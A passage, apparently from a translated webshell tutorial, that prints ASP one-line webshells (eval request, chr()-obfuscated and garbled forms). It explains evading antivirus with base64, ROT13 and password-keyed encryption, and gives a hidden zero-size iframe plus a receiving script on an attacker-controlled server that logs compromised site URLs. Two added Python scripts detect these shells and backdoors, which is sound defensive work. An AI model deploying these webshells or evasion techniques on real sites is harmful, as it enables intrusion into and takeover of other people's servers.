6. Garbled-text transformation (ANSI -> Unicode encoding)
<%eval request("#")%> is transformed into "┼攠數畣整爠煥敵瑳∨∣┩愾"
<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
The line above uses ASCII encoding: chr(114) is the character numbered 114 in ASCII, i.e. r, and the seven chr() calls spell "request". After conversion the code is
<%eval(request("brute"))%>
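An added example, not from the original article, from the detection side: a small Python normalizer that undoes the evasions described in section 1 (XOR-built "_POST") and sections 4 to 6 (execute or eval on request, chr()-built "request", the split through session(), and the ANSI-to-Unicode garbled form) before matching signatures, so each of the quoted variants is flagged. All sample inputs are constructed.

```python
"""Normalize obfuscated one-sentence webshell source before signature matching.

Added example, not from the article. It undoes the evasions the article shows:
PHP ("a"^"b") XOR pieces rebuilt into "_POST" (section 1), ASP chr()-built
"request" (section 6), the ANSI->Unicode garbled form (section 6) and the
split that copies request() into session() before execute (section 5).
Every sample input below is constructed for the demonstration.
"""
import re

_PHP_XOR = re.compile(r'\(\s*"(.)"\s*\^\s*"(.)"\s*\)')   # ("#"^"|") -> "_"
_ASP_CHR = re.compile(r'chr\((\d+)\)', re.IGNORECASE)    # chr(114)   -> "r"
_JOIN = re.compile(r'"\s*[.+&]\s*"')                     # "a"."b" / "a"+"b" -> "ab"
# eval/execute fed (possibly through a nested eval) from request or session.
_ASP_EXEC = re.compile(r'(eval|execute)\(*"?(request|session)\b')
# Split form: session("x")=request("x") ... execute session("x").
_ASP_SPLIT = re.compile(r'session\("(\w+)"\)=request\("\1"\)')
PHP_SIGNATURES = ("_post", "_get", "_request", "eval", "assert", "system")


def unscramble_utf16(text):
    """Undo the ANSI->Unicode trick: each CJK char is really two ASCII bytes."""
    if text.isascii():
        return text
    try:
        return text.encode("utf-16-le").decode("ascii")
    except UnicodeDecodeError:
        return text


def normalize(source):
    """Resolve char constructs, merge literals, drop whitespace, lower-case."""
    text = unscramble_utf16(source)
    text = _PHP_XOR.sub(lambda m: '"%s"' % chr(ord(m.group(1)) ^ ord(m.group(2))), text)
    text = _ASP_CHR.sub(lambda m: '"%s"' % chr(int(m.group(1))), text)
    text = _JOIN.sub("", text)
    return re.sub(r"\s+", "", text).lower()


def scan(source):
    """Return the indicators found in the normalized source, in a fixed order."""
    text = normalize(source)
    found = []
    for sig in PHP_SIGNATURES:
        if '"%s"' % sig in text:            # name rebuilt from XOR/chr pieces
            found.append("string-built:" + sig)
    if re.search(r"\$\{\$\w+\}\[", text):    # ${$x}[..](..): variable-variable call
        found.append("php-variable-variable")
    if _ASP_EXEC.search(text):
        found.append("asp-exec-from-request")
    if _ASP_SPLIT.search(text):
        found.append("asp-split-via-session")
    if not source.isascii() and text.isascii():
        found.append("utf16-garbled")
    return found


# Constructed samples modelled on the article's section 1, 4, 5 and 6 variants.
PHP_XOR = ('<?php @$_++; $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");\n'
           '@${$__}[!$_](${$__}[$_]); ?>')
ASP_CHR = '<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>'
ASP_SPLIT = ('<%if request("MH")<>"" then session("MH")=request("MH"):end if:'
             'if session("MH")<>"" then execute session("MH")%>')
ASP_GARBLED = '<% eval request("a")%>'.encode("ascii").decode("utf-16-le")  # 22 bytes -> 11 CJK chars
CLEAN = '<?php echo htmlspecialchars($_POST["name"]); ?>'

if __name__ == "__main__":
    for name, src in [("php-xor", PHP_XOR), ("asp-chr", ASP_CHR), ("asp-split", ASP_SPLIT),
                      ("asp-garbled", ASP_GARBLED), ("clean", CLEAN)]:
        print(name, scan(src))
```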
7. Anti-kill for a Da Ma
(1) base64 encoding
A Da Ma can be protected by compressing the Da Ma code, base64-encoding the compressed result, and then adding at the end of the Da Ma code
@eval(gzinflate(base64_decode($code)));
to execute the script. The $code variable stores the base64 text; on execution it is first decompressed by gzinflate and then run by eval. In fact this is not truly anti-kill, since base64_decode and eval are still in the signature list and it will still be killed when passing through the scanner.
(2) ROT13 encoding (php)
str_rot13 is a PHP encoding function. It can be used to encode script code to bypass signature detection. In the screenshot, the strrev function reverses the characters, and to escape signature detection the characters are deliberately separated with '.' signs. The three str_rot13-encoded names in the screenshot are gzinflate, str_rot13 and base64_decode in order, which amounts to triple encoding and avoids the two signatures gzinflate and base64_decode; str_rot13 itself is not avoided, and some anti-virus software may well use str_rot13 as a signature too. ROT13 means rotate by 13: each letter is replaced by the letter 13 positions away in the alphabet, so applying it twice returns the original text. Because the algorithm is fixed, the encryption strength is weak and breaking it is trivial: just apply it once more.
(3) Other encodings
Anti-virus software and scanners generally use signatures to decide whether something is malicious. When doing anti-kill work on a Da Ma, Xiao Ma or one-sentence Trojan in PHP or ASP, encoding functions such as base64 and rot13 are usually used to bypass scanners. I think you can also write your own encoding algorithm and encode the script code with it to avoid certain signatures: borrow ideas from methods such as the Caesar cipher and shift ciphers, write an algorithm and encode the script, and signatures such as base64 and rot13 will disappear; or simply use the home-made algorithm to encode just the signature strings and decode them when used. You can also use keyed algorithms such as DES and RSA. A Da Ma generally has a password login box; tie the login password to the decryption key so the code can only be decoded after the correct password is entered. On one hand this avoids detection by scanners and anti-virus software, on the other it is convenient: even if someone else obtains this Da Ma, they cannot decrypt it and read the source code.
5. About webshell backdoors
Da Ma downloaded from the Internet generally contain more or less backdoors, which directly let others take over the websites we obtain, so a downloaded Da Ma must first be checked for backdoors. For example, the universal password here (a fragment of the login code):
end function
if session("hehe")<>"" then
if request.form("pass")=userpass or request.form("pass")="1111111" then
session("hehe")=userpass
response.redirect url
else
Here
request.form("pass")=userpass
was originally used to verify the pass value: if the entered pass equals userpass, verification succeeds. But the later
or request.form("pass")="1111111"
means that entering 1111111 as pass also logs in to the Da Ma. Of course it is not always this simple: the original author may assign userpass twice and add a trigger condition that changes userpass when he logs in (for example, a failed login triggers the update of the userpass value), so that a suffix is added; moreover, the trigger code and the verification code are far apart and hard to find. Then the Da Ma code has to be analysed line by line.
Next, the frame used to mount the Trojan:
<iframe src="backdoor address" width=0 height=0></iframe>
Here the linked address has width and height set to 0, so the frame is hidden on the page. The "backdoor address" points to your own receiving script, which you finally place on a public server you control. The receiving script is as follows:
<%
url=Request.ServerVariables("HTTP_Referer")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("hehe.txt"),8,True)
file.writeline url
file.close
set file=nothing
set fs=nothing
%>
where
url=Request.ServerVariables("HTTP_Referer")
reads the Referer of the request, i.e. the URL of the Da Ma page, and the URL is then saved to hehe.txt in the current directory.
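An added example (not from the article) of the backdoor check the text recommends: a Python scan of a downloaded Da Ma source for a second hard-coded password, a later reassignment of userpass, and a hidden iframe. The sample source and the example.invalid receiver address are constructed.

```python
"""Check a downloaded Da Ma source for the backdoor patterns described above.

Added example, not from the article. It reports (1) password checks that
compare the login field with a hard-coded literal instead of userpass,
(2) places where userpass is reassigned after its first definition, and
(3) hidden iframes (width/height 0 or display:none) whose src would leak the
shell's URL through the Referer header. The sample source is constructed.
"""
import re

# ASP request.form("pass")="literal"  or  PHP $_POST["pass"]=="literal"
_LITERAL_PASS = re.compile(
    r'(request\.form\(\s*"pass"\s*\)|\$_(?:post|request)\[\s*["\']pass["\']\s*\])'
    r'\s*={1,3}\s*"([^"]*)"', re.IGNORECASE)
# userpass assigned at the start of a line (the first one is the real config).
_USERPASS_ASSIGN = re.compile(r'^\s*(?:dim\s+)?userpass\s*=\s*(.*)$', re.IGNORECASE)
_HIDDEN_IFRAME = re.compile(
    r'<iframe\b[^>]*?(?:\b(?:width|height)\s*=\s*["\']?0\b|display\s*:\s*none)[^>]*>',
    re.IGNORECASE)


def check_shell_source(source):
    """Return (kind, line_no, detail) tuples for every suspicious construct."""
    findings = []
    userpass_seen = 0
    for no, line in enumerate(source.splitlines(), 1):
        for m in _LITERAL_PASS.finditer(line):
            findings.append(("hardcoded-password", no, m.group(2)))
        if _USERPASS_ASSIGN.match(line):
            userpass_seen += 1
            if userpass_seen > 1:
                findings.append(("userpass-reassigned", no, line.strip()))
        for m in _HIDDEN_IFRAME.finditer(line):
            findings.append(("hidden-iframe", no, m.group(0)))
    return findings


# Constructed sample built from the login fragment and iframe quoted above.
SAMPLE = '''<%
userpass = "admin"
if session("hehe")<>"" then
if request.form("pass")=userpass or request.form("pass")="1111111" then
session("hehe")=userpass
response.redirect url
else
userpass = "1111111"
end if
%>
<iframe src="http://example.invalid/recv.asp" width=0 height=0></iframe>
'''

if __name__ == "__main__":
    for kind, no, detail in check_shell_source(SAMPLE):
        print("line %d: %s: %s" % (no, kind, detail))
```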
To remove this kind of backdoor, first disable the second password check in the Da Ma (the master password) by deleting the related function code; then check whether any ASP Da Ma page contains a hidden URL such as width=0 height=0, find it and delete it.
The above has introduced the implementation and hiding of webshells and related aspects. I hope it is helpful to friends interested in PHP tutorials.
